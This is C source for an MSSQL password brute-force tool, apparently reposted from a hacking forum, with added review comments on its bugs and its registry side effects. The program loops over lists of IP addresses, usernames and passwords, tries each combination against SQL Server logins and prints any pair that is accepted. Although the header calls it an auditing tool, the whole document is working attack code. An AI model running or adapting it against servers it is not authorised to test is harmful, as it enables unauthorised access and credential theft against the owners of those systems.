/* Forum post by Gabriel87 (July 19, 2011); source credited as "Hackhound". */

/*
sqlbf - MSSQL server brute force tool by xaphan (xaphan@hushmail.com)

This is a tool for auditing the strength of your SQL login passwords.

Usage: sqlbf [ODBC NetLib] [IP List] [User list] [Password List]

ODBC NetLib : T - TCP/IP, P - Named Pipes (netBIOS)
IP list - text file containing list of IPs to audit
User list - text file containing list of Usernames
Password List - text file containing list of passwords

I don't do much error checking, so don't screw up.
*/

/* Precompiled-header include; presumably pulls in <windows.h>, <sql.h> and
 * <sqlext.h> for the Win32 registry and ODBC calls used below — verify. */
#include "stdafx.h"

/*
 * sqlpoke - attempt one ODBC connection using the given connection string.
 *
 * constr: NUL-terminated ODBC connection string (DRIVER=...;SERVER=...;UID=...;PWD=...).
 *
 * Returns:
 *    1  the driver connected (any return code other than SQL_ERROR, see note below)
 *    0  SQLDriverConnect failed with SQLSTATE 28000 (login rejected by the server)
 *   -1  SQLDriverConnect failed with any other diagnosed SQLSTATE
 *
 * NOTE(review): the return codes of SQLAllocHandle/SQLSetEnvAttr are not checked;
 * if handle allocation fails, SQLDriverConnect is called with a null handle.
 * NOTE(review): if retcode == SQL_ERROR but SQLGetDiagRec itself returns SQL_ERROR,
 * control falls through to the "successful connect" path and the function returns 1,
 * so a failed connection can be reported as a success.
 */
int sqlpoke(char *constr)
{
    SQLHENV henv = SQL_NULL_HENV;
    SQLHDBC hdbc1 = SQL_NULL_HDBC;
    SQLHSTMT hstmt1 = SQL_NULL_HSTMT;   // unused: no statement is ever executed
    RETCODE retcode;
    // sqlstate holds the 5-character SQLSTATE plus its terminator.
    SQLCHAR szOutConn[1024], sqlstate[6], errmsg[SQL_MAX_MESSAGE_LENGTH];
    SQLSMALLINT szint, msglen;
    SQLINTEGER nativeerr;
    int count=0, l = 0, p = 0;          // unused locals

    retcode = SQLAllocHandle (SQL_HANDLE_ENV, NULL, &henv);
    retcode = SQLSetEnvAttr(henv, SQL_ATTR_ODBC_VERSION, (SQLPOINTER) SQL_OV_ODBC3, SQL_IS_INTEGER);
    retcode = SQLAllocHandle(SQL_HANDLE_DBC, henv, &hdbc1);
    // SQL_DRIVER_NOPROMPT: never pop up a login dialog; the connection string must be complete.
    retcode = SQLDriverConnect(hdbc1, NULL, (SQLTCHAR*)constr, SQL_NTS, szOutConn, 1024, &szint, SQL_DRIVER_NOPROMPT);

    if (retcode == SQL_ERROR) {
        // 28000 == bad user/pass
        // Only the first diagnostic record is inspected.
        if ( SQLGetDiagRec(SQL_HANDLE_DBC, hdbc1, 1, sqlstate, &nativeerr, errmsg, sizeof(errmsg), &msglen) != SQL_ERROR) {
            if ( strcmp((char *)sqlstate, "28000") == 0) {
                //try again
                // No SQLDisconnect here: the connection was never established.
                SQLFreeHandle(SQL_HANDLE_DBC, hdbc1);
                SQLFreeHandle(SQL_HANDLE_ENV, henv);
                return 0;
            }
            // dont bother trying again
            // Any other SQLSTATE (e.g. host unreachable, driver error) is treated as fatal for this host.
            SQLFreeHandle(SQL_HANDLE_DBC, hdbc1);
            SQLFreeHandle(SQL_HANDLE_ENV, henv);
            return -1;
        }
    }

    // Reached for every retcode other than SQL_ERROR (and for SQL_ERROR when
    // SQLGetDiagRec failed — see NOTE above).
    SQLDisconnect(hdbc1);
    SQLFreeHandle(SQL_HANDLE_DBC, hdbc1);
    SQLFreeHandle(SQL_HANDLE_ENV, henv);
    // successful connect
    return 1;
}

/*
 * usage - print the command-line synopsis to stdout.
 */
void usage()
{
    printf("\nUsage:\tsqlbf [ODBC NetLib] [IP List] [User list] [Password List]\n\n");
    printf("\t\tODBC NetLib : T - TCP/IP, P - Named Pipes (netBIOS)\n\n");
    return;
}

/*
 * main - drive the three nested lists (IPs, users, passwords) through sqlpoke().
 *
 * argv[1]  "P" selects Named Pipes (mode 0); any other value selects TCP/IP (mode 1).
 * argv[2]  path of the IP list
 * argv[3]  path of the username list
 * argv[4]  path of the password list
 *
 * Returns 0 on every path, including the error paths, so the exit status does not
 * distinguish success from failure.
 *
 * Host-side side effect: the program rewrites the machine-wide default SQL client
 * network library (HKLM\SOFTWARE\Microsoft\MSSQLServer\Client\ConnectTo, value
 * DSQUERY) for the duration of the run and restores it at the end. Opening that
 * key with KEY_ALL_ACCESS requires write access to HKLM, i.e. normally an
 * administrator. Every process on the host that uses the SQL Server driver sees the
 * changed value while the run is in progress, and a crash mid-run leaves it
 * changed; from a monitoring point of view, writes to that value are the
 * observable local footprint of this program.
 *
 * NOTE(review): the three FILE streams are never fclose()d; they are released only
 * at process exit.
 */
int main(int argc, char* argv[])
{
    // ip/username/password are 20-byte buffers: fgets() reads at most 19
    // characters per call, so a longer line is consumed in several pieces on
    // successive iterations. constr (1024 bytes) comfortably holds the longest
    // string sprintf() below can build from three 19-character fields.
    char *data, ip[20], username[20], password[20], constr[1024];
    int mode, c = 0, err;
    HKEY hReg;
    DWORD type, so_data;
    FILE *ips, *users, *pwds;

    if (argc != 5) {
        usage();
        return 0;
    }

    // mode 0 = Named Pipes, mode 1 = TCP/IP (the default for any non-"P" value).
    if ( strcmp(argv[1], "P") == 0 )
        mode = 0;
    else
        mode = 1;

    //open IP list
    if ( (ips = fopen(argv[2], "rt")) == NULL) {
        printf("Error opening IP list.\n");
        return 0;
    }
    //open user list
    if ( (users = fopen(argv[3], "rt")) == NULL) {
        printf("Error opening user list.\n");
        return 0;
    }
    //open pwd list
    if ( (pwds = fopen(argv[4], "rt")) == NULL) {
        printf("Error opening password list.\n");
        return 0;
    }

    // Scratch buffer that receives the previous DSQUERY value so it can be
    // restored at the end. NOTE(review): the malloc() result is not checked.
    data = (char *)malloc(64);

    // set the default client lib
    // NOTE(review): if RegOpenKeyEx fails, execution continues with hReg unopened
    // and data uninitialised; the restore at the end of main then uses both.
    if ( RegOpenKeyEx ( HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\MSSQLServer\\Client\\ConnectTo", 0, KEY_ALL_ACCESS, &hReg) == ERROR_SUCCESS) {
        //store previous value
        // NOTE(review): so_data is the in/out buffer-size argument and is passed
        // without first being set to the 64-byte size of data.
        if ( RegQueryValueEx(hReg, "DSQUERY", NULL, &type, (unsigned char *)data, &so_data) != ERROR_SUCCESS) {
            printf("Unable to store SQL Library value.\n");
            free(data);
            return 0;
        }
        // mode is always 0 or 1 here, so the missing default: cannot leave err unset.
        switch (mode ) {
        case 0: // Named Pipes
            so_data = strlen("DBNMPNTW") + 1;
            err = RegSetValueEx(hReg, "DSQUERY",0, REG_SZ , (unsigned char *)"DBNMPNTW", so_data);
            break;
        case 1: // TCP/IP
            so_data = strlen("DBMSSOCN") + 1;
            err = RegSetValueEx(hReg, "DSQUERY",0, REG_SZ , (unsigned char *)"DBMSSOCN", so_data);
            break;
        }
        if (err != 0) {
            printf("Error Setting SQL Network Library.\n");
            free(data);
            return 0;
        }
    }

    // Outer loop: one IP per line. The while(!feof()) idiom tests EOF before the
    // read, so after the last line one extra iteration runs with fgets() failing;
    // presumably the buffer then still holds the previous line — verify.
    while (!feof(ips)) {
        //read IP from stream
        fgets(ip, 20, ips);
        // Strip the trailing newline left by fgets(); c is reset to 0 afterwards
        // because the same index variable is shared by all three loops.
        while (ip[c] != '\0') {
            if (ip[c] == '\n')
                ip[c] = '\0';
            c++;
        }
        c = 0;
        // Middle loop: one username per line; the stream is rewound for each IP.
        while (!feof(users)) {
            //read username from stream
            fgets(username, 20, users);
            while (username[c] != '\0') {
                if (username[c] == '\n')
                    username[c] = '\0';
                c++;
            }
            c = 0;
            // Inner loop: one password per line; the stream is rewound for each username.
            while (!feof(pwds)) {
                //read a password from pwd stream
                fgets(password, 20, pwds);
                while (password[c] != '\0') {
                    if (password[c] == '\n')
                        password[c] = '\0';
                    c++;
                }
                c = 0;
                //build connection stream based on mode
                if (mode == 0) {
                    // Named Pipes: SERVER=<ip>, with nothing after the comma (no port).
                    sprintf(constr, "%s%s%s%s%s%s%s", "DRIVER={SQL Server};SERVER=", ip, "," , ";UID=", username,";PWD=", password);
                } else {
                    //the port should be set by the user or in an ini, but I'm lazy
                    // TCP/IP: SERVER=<ip>,1433 hard-coded.
                    sprintf(constr, "%s%s%s%d%s%s%s%s", "DRIVER={SQL Server};SERVER=", ip, ",", 1433, ";UID=", username,";PWD=", password);
                }
                //call sqlpoke
                err = sqlpoke(constr);
                if ( err == 1) {
                    // The accepted credentials are written to stdout in plain text;
                    // redirecting this output to a file persists them on disk.
                    printf("\nConnected to %s with username \'%s\' and password \'%s\'\n", ip, username, password);
                    // Leave the password loop only; the next username on this IP is still tried.
                    break;
                } else if (err == -1) {
                    //Bail out of this IP
                    printf("\nError - unable to connect to SQL server on %s.\n", ip);
                    fseek(pwds, 0, SEEK_SET);
                    fseek(users, 0, SEEK_SET);
                    goto next; // Mmmm... a goto
                }
                // Progress marker for a rejected login (sqlpoke returned 0).
                printf(".");
            }
            fseek(pwds, 0, SEEK_SET);
        }
        fseek(users, 0, SEEK_SET);
next:;
    }

    // Restore the previous DSQUERY value. strlen(data) assumes the stored value
    // was a NUL-terminated REG_SZ string.
    so_data = strlen(data) + 1;
    err = RegSetValueEx(hReg, "DSQUERY",0, REG_SZ , (unsigned char *)data, so_data);
    if (err != 0)
        printf("Error resetting the SQL network library.\n");
    free(data);
    RegCloseKey(hReg);
    printf("\nFin.\n");
    return 0;
}